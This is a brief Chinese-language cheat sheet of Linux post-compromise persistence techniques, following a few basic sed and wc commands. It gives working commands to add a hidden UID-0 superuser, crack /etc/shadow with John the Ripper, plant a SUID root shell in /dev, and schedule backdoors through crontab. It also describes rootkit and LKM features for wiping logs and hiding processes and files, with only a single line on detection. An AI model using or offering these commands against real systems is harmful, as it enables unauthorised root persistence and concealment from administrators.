 | 常用的基本编辑命令:
sed ‘s/src/dst/’ file 替换内容
sed ’1,5d’ file 删除行
wc -l file 计算文件的行数
1 增加超级用户账号
useradd -o -u 0 -p “Linux加密的密码” imiyoo
echo “imiyoo:x:0:0::/:/bin/sh”>>/ets/passwd
2 破解root用户密码
./john /etc/shadow -show
./john -wordlist=passwd.lst /etc/shadow
3 放置SUID Shell
cp /bin/bash /dev/.rootshell
chmod a+s /dev/.rootshell //赋予该程序所有者以suid权限
4 Crontab定时任务
通过Crontab程序调度已安装的后门程序定时运行
Crontab文件内容格式描述:
* * * * * command
分 时 日 月 周 命令
第1列表示分钟1~59 每分钟用*或者 */1表示
第2列表示小时1~23(0表示0点)
第3列表示日期1~31
第4列表示月份1~12
第5列标识号星期0~6(0表示星期天)
第6列要运行的命令
其中 ‘,’表示时间的分割,由多个时间点组成;’*/6′表示每间隔6个单位就循环执行;’-'表示从某个起点到终点的所有时间
cron服务每分钟不仅要读一次/var/spool/cron内的所有文件,还需要读一次/etc/crontab,因此我们配置这个文件也能运用
cron服务做一些事情。用crontab配置是针对某个用户的,而编辑/etc/crontab是针对系统的任务。
/sbin/service crond start //启动服务
/sbin/service crond stop //关闭服务
/sbin/service crond restart //重启服务
/sbin/service crond reload //重新载入配置
你也可以将这个服务在系统启动的时候自动启动:
在/etc/rc.d/rc.local这个脚本的末尾加上:
/sbin/service crond start
crontab -l列出当前用户目前的crontab
5 工具包Rootkit
包含一系列系统及后门工具:
- 清除日志中的登录记录
- 伪装校验和
- 替换netstat、ps等网络工具
- 后门登录程序易于安装和使用
6 可装载内核模块(LKM)
LKM:Loadable Kernel Modules 动态的加载,不需要重新编译内核。
截获系统调用,具有隐藏目录、文件、进程、网络连接等强大功能。
自身隐蔽性好,发现难度较大。著名的LKM包有adore和knark。
后门的检测
使用Tripwire或md5校验来检查系统。借助IDS系统,监听到目标机器的可疑网络连接。
7 查看Linux的发行版本
cat /etc/issue
| |
